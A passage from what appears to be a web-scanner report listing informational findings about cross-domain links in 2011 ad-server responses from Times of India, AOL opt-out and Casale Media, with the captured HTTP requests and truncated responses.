The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1165705968@Top? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:34:57 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Set-Cookie: RMFD=011R02OxO206Bs|O108EZ|O108FG|O108KY|O108i0|O108ih; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.indiatimes.com
Content-Length: 183
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<script type='text/javascript'>
var ACE_AR = {site: '800699', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>

21.12. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1324821476@Top  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1324821476@Top

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1324821476@Top? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs|O108ih

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:00:50 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Set-Cookie: RMFD=011R02dtO206Bq|O306Bs|O108EZ|O308FG|O108i0|O108ih; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.indiatimes.com
Content-Length: 245
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<script type="text/javascript">
var CasaleArgs = new Object();
CasaleArgs.version = 2;
CasaleArgs.adUnits = "2";
CasaleArgs.casaleID = 119232;
</script>
<script type="text/javascript" src="http://js.casalemedia.com/casaleJTag.js"></script>

21.13. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1352497994@Right3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1352497994@Right3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1352497994@Right3? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs|O108ih

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:01:27 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Set-Cookie: RMFD=011R02OxO306Bs|O108EZ|O108KY; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.indiatimes.com
Content-Length: 183
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<script type='text/javascript'>
var ACE_AR = {site: '800700', size: '300250'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>

21.14. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1507534702@Right1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1507534702@Right1

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1507534702@Right1? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs|O108ih

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:01:46 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 1438
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<!--
Support: http://adstil.indiatimes.com#OasDefault/3670000929000010THEADVER6209TOIR#Advertisement12Aug#Advertisement12Aug.html#0a87c#1313160034#422#Hc#Right1#www.timesofindia.com/TOI2009_City_Mum
...[SNIP]...
<!-- begin ZEDO for channel: HLW on Times of India , publisher: Times of India , Ad Dimension: Medium Rectangle - 300 x 250 -->
<iframe src="http://d3.zedo.com/jsc/d3/ff2.html?n=1302;c=202;s=32;d=9;w=300;h=250;l=[INSERT_CLICK_TRACKER_MACRO]" frameborder=0 marginheight=0 marginwidth=0 scrolling="no" allowTransparency="true" width=300 height=250></iframe>
...[SNIP]...

21.15. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1679277654@Right1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1679277654@Right1

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1679277654@Right1? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:36:58 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Set-Cookie: RMFD=011R02OxO106Bq|O306Bs|O108EZ|O108Ea|O108FG|O108KY|O108i0|O108ih; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.indiatimes.com
Content-Length: 245
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<script type="text/javascript">
var CasaleArgs = new Object();
CasaleArgs.version = 2;
CasaleArgs.adUnits = "4";
CasaleArgs.casaleID = 119232;
</script>
<script type="text/javascript" src="http://js.casalemedia.com/casaleJTag.js"></script>

21.16. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1801219238@Right2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1801219238@Right2

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1801219238@Right2? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs|O108ih

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:01:48 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Set-Cookie: RMFD=011R02xiO306Bq|O306Bs|O108FG|O108KY|O108i0; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.indiatimes.com
Content-Length: 183
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<script type='text/javascript'>
var ACE_AR = {site: '804611', size: '300250'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>

21.17. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1982094345@Right1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1982094345@Right1

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1982094345@Right1? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/topic/Xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO206Bs|O108EZ|O108FG|O108i0|O108ih; _iibeat_session=02f2ca4f-6c90-4fc2-993c-84fedfef7948

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:35:59 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 1423
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<!--
Support: http://adstil.indiatimes.com#OasDefault/3670000929000010THEADVER6209TOIR#Advertisement12Aug#Advertisement12Aug.html#0a87c#1313160034#422#Hc#Right1#www.timesofindia.com/TOI2009_TOPICS/i
...[SNIP]...
<!-- begin ZEDO for channel: HLW on Times of India , publisher: Times of India , Ad Dimension: Medium Rectangle - 300 x 250 -->
<iframe src="http://d3.zedo.com/jsc/d3/ff2.html?n=1302;c=202;s=32;d=9;w=300;h=250;l=[INSERT_CLICK_TRACKER_MACRO]" frameborder=0 marginheight=0 marginwidth=0 scrolling="no" allowTransparency="true" width=300 height=250></iframe>
...[SNIP]...

21.18. http://advertising.aol.com/nai/nai.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /nai/nai.php?action_id=3 HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 10:59:21 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache, max-age=1
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Expires: Sun, 04 Sep 2011 10:59:22 GMT
Content-Type: text/html
Content-Length: 13500


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script>

   // dynamic variables
   var numFrames = 9;
   var redirectUrlNoCookie = "http://www.networkadvertising.org/verify/no_cookie.gif";
   var redire
...[SNIP]...
<body onload='getStatus();' >
<iframe id='frame_0' src='http://nai.advertising.com/nai/daa.php?action_id=3&participant_id=0&rd=http%3A%2F%2Fadvertising.aol.com&nocache=3570753' height='1' width='1'></iframe>
<br />
<iframe id='frame_1' src='http://nai.adsonar.com/nai/daa.php?action_id=3&participant_id=1&rd=http%3A%2F%2Fadvertising.aol.com&nocache=3570753' height='1' width='1'></iframe>
<br />
<iframe id='frame_2' src='http://nai.tacoda.at.atwola.com/nai/daa.php?action_id=3&participant_id=2&rd=http%3A%2F%2Fadvertising.aol.com&nocache=3570753' height='1' width='1'></iframe>
<br />
<iframe id='frame_3' src='http://nai.adtech.de/nai/daa.php?action_id=3&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=3570753' height='1' width='1'></iframe>
<br />
<iframe id='frame_4' src='http://nai.ad.us-ec.adtechus.com/nai/daa.php?action_id=3&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=3570753' height='1' width='1'></iframe>
<br />
<iframe id='frame_5' src='http://nai.adserver.adtechus.com/nai/daa.php?action_id=3&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=3570753' height='1' width='1'></iframe>
<br />
<iframe id='frame_6' src='http://nai.adserverec.adtechus.com/nai/daa.php?action_id=3&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=3570753' height='1' width='1'></iframe>
<br />
<iframe id='frame_7' src='http://nai.adserverwc.adtechus.com/nai/daa.php?action_id=3&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=3570753' height='1' width='1'></iframe>
<br />
<iframe id='frame_8' src='http://nai.glb.adtechus.com/nai/daa.php?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=3570753' height='1' width='1'></iframe>
...[SNIP]...

21.19. http://advertising.aol.com/nai/nai.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /nai/nai.php?action_id=4 HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: token_nai_advertising_com=1170877546; token_nai_adsonar_com=1462706141; token_nai_tacoda_at_atwola_com=2011729621; token_nai_adtech_de=1144859041; token_nai_ad_us-ec_adtechus_com=1214941173; token_nai_adserver_adtechus_com=2011695027; token_nai_adserverec_adtechus_com=737485457; token_nai_adserverwc_adtechus_com=585611182; token_nai_glb_adtechus_com=592246145

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:13:17 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache, max-age=1
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Expires: Sun, 04 Sep 2011 11:13:18 GMT
Content-Type: text/html
Content-Length: 13647


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script>

   // dynamic variables
   var numFrames = 9;
   var redirectUrlNoCookie = "http://www.networkadvertising.org/verify/no_cookie.gif";
   var redire
...[SNIP]...
<body onload='optOut();' >
<iframe id='frame_0' src='http://nai.advertising.com/nai/daa.php?action_id=4&participant_id=0&rd=http%3A%2F%2Fadvertising.aol.com&nocache=3978572&token=1170877546' height='1' width='1'></iframe>
<br />
<iframe id='frame_1' src='http://nai.adsonar.com/nai/daa.php?action_id=4&participant_id=1&rd=http%3A%2F%2Fadvertising.aol.com&nocache=3978572&token=1462706141' height='1' width='1'></iframe>
<br />
<iframe id='frame_2' src='http://nai.tacoda.at.atwola.com/nai/daa.php?action_id=4&participant_id=2&rd=http%3A%2F%2Fadvertising.aol.com&nocache=3978572&token=2011729621' height='1' width='1'></iframe>
<br />
<iframe id='frame_3' src='http://nai.adtech.de/nai/daa.php?action_id=4&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=3978572&token=1144859041' height='1' width='1'></iframe>
<br />
<iframe id='frame_4' src='http://nai.ad.us-ec.adtechus.com/nai/daa.php?action_id=4&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=3978572&token=1214941173' height='1' width='1'></iframe>
<br />
<iframe id='frame_5' src='http://nai.adserver.adtechus.com/nai/daa.php?action_id=4&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=3978572&token=2011695027' height='1' width='1'></iframe>
<br />
<iframe id='frame_6' src='http://nai.adserverec.adtechus.com/nai/daa.php?action_id=4&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=3978572&token=737485457' height='1' width='1'></iframe>
<br />
<iframe id='frame_7' src='http://nai.adserverwc.adtechus.com/nai/daa.php?action_id=4&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=3978572&token=585611182' height='1' width='1'></iframe>
<br />
<iframe id='frame_8' src='http://nai.glb.adtechus.com/nai/daa.php?action_id=4&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=3978572&token=592246145' height='1' width='1'></iframe>
...[SNIP]...

21.20. http://advertising.aol.com/nai/nai.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /nai/nai.php?action_id=3 HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: token_nai_advertising_com=1170877546; token_nai_adsonar_com=1462706141; token_nai_tacoda_at_atwola_com=2011729621; token_nai_adtech_de=1144859041; token_nai_ad_us-ec_adtechus_com=1214941173; token_nai_adserver_adtechus_com=2011695027; token_nai_adserverec_adtechus_com=737485457; token_nai_adserverwc_adtechus_com=585611182; token_nai_glb_adtechus_com=592246145

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 10:59:38 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache, max-age=1
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Expires: Sun, 04 Sep 2011 10:59:39 GMT
Content-Type: text/html
Content-Length: 13500


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script>

   // dynamic variables
   var numFrames = 9;
   var redirectUrlNoCookie = "http://www.networkadvertising.org/verify/no_cookie.gif";
   var redire
...[SNIP]...
<body onload='getStatus();' >
<iframe id='frame_0' src='http://nai.advertising.com/nai/daa.php?action_id=3&participant_id=0&rd=http%3A%2F%2Fadvertising.aol.com&nocache=7026355' height='1' width='1'></iframe>
<br />
<iframe id='frame_1' src='http://nai.adsonar.com/nai/daa.php?action_id=3&participant_id=1&rd=http%3A%2F%2Fadvertising.aol.com&nocache=7026355' height='1' width='1'></iframe>
<br />
<iframe id='frame_2' src='http://nai.tacoda.at.atwola.com/nai/daa.php?action_id=3&participant_id=2&rd=http%3A%2F%2Fadvertising.aol.com&nocache=7026355' height='1' width='1'></iframe>
<br />
<iframe id='frame_3' src='http://nai.adtech.de/nai/daa.php?action_id=3&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=7026355' height='1' width='1'></iframe>
<br />
<iframe id='frame_4' src='http://nai.ad.us-ec.adtechus.com/nai/daa.php?action_id=3&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=7026355' height='1' width='1'></iframe>
<br />
<iframe id='frame_5' src='http://nai.adserver.adtechus.com/nai/daa.php?action_id=3&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=7026355' height='1' width='1'></iframe>
<br />
<iframe id='frame_6' src='http://nai.adserverec.adtechus.com/nai/daa.php?action_id=3&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=7026355' height='1' width='1'></iframe>
<br />
<iframe id='frame_7' src='http://nai.adserverwc.adtechus.com/nai/daa.php?action_id=3&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=7026355' height='1' width='1'></iframe>
<br />
<iframe id='frame_8' src='http://nai.glb.adtechus.com/nai/daa.php?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=7026355' height='1' width='1'></iframe>
...[SNIP]...

21.21. http://api.tweetmeme.com/v2/follow.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.tweetmeme.com
Path:   /v2/follow.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /v2/follow.js?screen_name=ProfitNDTV&style=normal HTTP/1.1
Host: api.tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://social.ndtv.com/NDTVProfit
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sun, 04 Sep 2011 03:38:31 GMT
Content-Type: text/html
Connection: close
P3P: CP="CAO PSA"
X-Served-By: swift
Content-Length: 2735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <title>TweetMeme F
...[SNIP]...
<a class="profile_image" href="/ajax/partial?body=follow&screen_name=ProfitNDTV" title="View Profile">
                   <img src="http://a1.twimg.com/sticky/default_profile_images/default_profile_2_normal.png" alt="ProfitNDTV" height="32px" width="32px" />
                                   </a>
...[SNIP]...
</div>
               
                                   <a class="follow" href="http://twitter.com/ProfitNDTV" title="Follow ProfitNDTV on Twitter">Follow</a>
...[SNIP]...

21.22. http://as.casalemedia.com/j  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as.casalemedia.com
Path:   /j

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /j?s=119232&u=http%3A%2F%2Ftimesofindia.indiatimes.com%2Fcity%2Fmumbai%2Farticlelist%2F-2128838597.cms&a=2&id=35968545&p=10&v=2&inif=1&l=0&t=0&w=1920&h=1156&z=300 HTTP/1.1
Host: as.casalemedia.com
Proxy-Connection: keep-alive
Referer: http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1165705968@Top?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMDD=AAF1owE*; CMIMP=102679&1315097282; CMRUM2=04000000002925993182975414771; CMID=qPptfUPS1JUAAD6emfQAAAAa; CMPS=179; CMPP=016; CMS=65131&1314825471&95308&1314825468&102679&1315097055; CMST=TmLJ305iyswF; CMD1=AAFehU5iyswAAZEXAAOXuwEBAQABK4NOXqT-AAD+awAC-OsBAQAAAUxxTl6k-AABdEwAA0OMAQEA

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/javascript
Expires: Sun, 04 Sep 2011 02:37:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 02:37:33 GMT
Content-Length: 936
Connection: close
Set-Cookie: CMID=pCu470PS1JUAACQkUeAAAAAJ;domain=casalemedia.com;path=/;expires=Mon, 03 Sep 2012 02:37:33 GMT
Set-Cookie: CMPS=179;domain=casalemedia.com;path=/;expires=Sat, 03 Dec 2011 02:37:33 GMT
Set-Cookie: CMPP=016;domain=casalemedia.com;path=/;expires=Sat, 03 Dec 2011 02:37:33 GMT
Set-Cookie: CMRUM2=14000000006731d4ad-7dae-4402-b507-a0bc233d79fb;domain=casalemedia.com;path=/;expires=Mon, 03 Sep 2012 02:37:33 GMT
Set-Cookie: CMST=TmLkMU5i5G0C;domain=casalemedia.com;path=/;expires=Mon, 05 Sep 2011 02:37:33 GMT
Set-Cookie: CMDD=AAHRwAE*;domain=casalemedia.com;path=/;expires=Mon, 05 Sep 2011 02:37:33 GMT
Set-Cookie: CMD2=AAFbfk5i4gIAAdHAAAOPCAEBAAABW3NOYuRtAAHRwAADjNcBAQAAAVtWTmLhpgAB0cAAA48sAQEA;domain=casalemedia.com;path=/;expires=Tue, 04 Oct 2011 02:37:33 GMT

document.write('<iframe id=\'3c5f1556\' name=\'3c5f1556\' src=\'http://cas.sv.us.criteo.com/delivery/afr.php?zoneid=24952&bannerid=159988&did=4525c30c6e&rtb=10&z=0.8&b=_1UiJy1FIJchYk6jmJ18Z4w%253d%253
...[SNIP]...
</iframe>');document.write('<img src="http://casale-match.dotomi.com/?cm_dsp_id=22&cm_user_id=pCu470PS1JUAACQkUeAAAAAJ&cm_callback_url=http%3A%2F%2Fr.casalemedia.com%2Frum" style="display:none" width="0" height="0" alt="" border="0" />');

21.23. http://as.casalemedia.com/j  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as.casalemedia.com
Path:   /j

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /j?s=119232&u=http%3A%2F%2Ftimesofindia.indiatimes.com%2Fcity%2Fmumbai%2FMy-friend-Ganesha%2Farticleshow%2F9855193.cms&a=2&id=59248402&p=10&v=2&inif=1&l=0&t=0&w=1920&h=1156&z=300 HTTP/1.1
Host: as.casalemedia.com
Proxy-Connection: keep-alive
Referer: http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1324821476@Top?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
